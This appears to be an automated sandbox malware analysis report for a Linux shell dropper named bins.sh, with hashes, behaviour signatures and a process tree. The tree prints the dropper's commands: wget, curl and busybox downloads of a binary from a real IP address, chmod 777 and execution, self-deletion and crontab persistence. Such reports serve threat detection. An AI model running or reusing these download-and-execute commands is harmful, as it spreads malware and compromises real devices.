Analysis

  • max time kernel
    149s
  • max time network
    105s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    25-11-2024 17:05

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    ff11827cacbdfc494c394c5d8e7272db

  • SHA1

    9acddf73007240f35b04f7fe4732d47cd0b04137

  • SHA256

    10e3e3e76552e191e9c880e374448c94e4d9ea8b76337345ffed3305d3b6722e

  • SHA512

    a045f1446bdb8160644c1e258d5a17327dc5d81b05bda3fddbe70b00007d6b63363d4b98f10a9c1fbcdf87befe5a73a543a4e0f7728feae5ad0e053384968958

  • SSDEEP

    192:JBVtKqN2M/XoDM9VR9/9d9k9I9NGjOHBVtKq8sXU9VR9/9d9k9I9Ton:t2MfoDM9X9/9d9k9I9NG6m2U9X9/9d9y

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:643
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:645
        • /usr/bin/wget
          wget http://216.126.231.240/bins/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
          2⤵
          • Writes file to tmp directory
          PID:647
        • /usr/bin/curl
          curl -O http://216.126.231.240/bins/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • Writes file to tmp directory
          PID:672
        • /bin/busybox
          /bin/busybox wget http://216.126.231.240/bins/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
          2⤵
          • Writes file to tmp directory
          PID:753
        • /bin/chmod
          chmod 777 VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
          2⤵
          • File and Directory Permissions Modification
          PID:754
        • /tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
          ./VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
          2⤵
          • Executes dropped EXE
          • Renames itself
          • Reads runtime system information
          PID:755
          • /bin/sh
            sh -c "crontab -l"
            3⤵
              PID:757
              • /usr/bin/crontab
                crontab -l
                4⤵
                • Reads runtime system information
                PID:758
            • /bin/sh
              sh -c "crontab -"
              3⤵
                PID:759
                • /usr/bin/crontab
                  crontab -
                  4⤵
                  • Creates/modifies Cron job
                  • Reads runtime system information
                  PID:760
            • /bin/rm
              rm VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr
              2⤵
                PID:762
              • /usr/bin/wget
                wget http://216.126.231.240/bins/cd9nXhZl3yxf9bhkxC4vm1haymeJGfIkMR
                2⤵
                  PID:765

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • /tmp/VaHVL2c90E23gNCWuAWrVcUYYJjIGbMlsr

                Filesize

                119KB

                MD5

                1b166b95f9cb4b079ef1b9ec8363ddf3

                SHA1

                0d8eb08add467b3b5474f9b25909297fe7c2839c

                SHA256

                94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

                SHA512

                983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

              • /var/spool/cron/crontabs/tmp.fQai3w

                Filesize

                210B

                MD5

                a8cdc9a79470432ff818c1f0cb667f99

                SHA1

                23cd257383dd969652ba19f24da2c9dd776adb98

                SHA256

                c7ae0dd4be7775c6bbfbdd64d1fefdb2a8440ea7ef863d7d7eddd9ce627b607c

                SHA512

                34c30829afd60c3593dae14e9f623afdab62bddc7c29b61a396d24e9d9c52819bbf4ac1cd7691977678c81eb1f76735f74155a97e181e0bc2d1533a62c94265d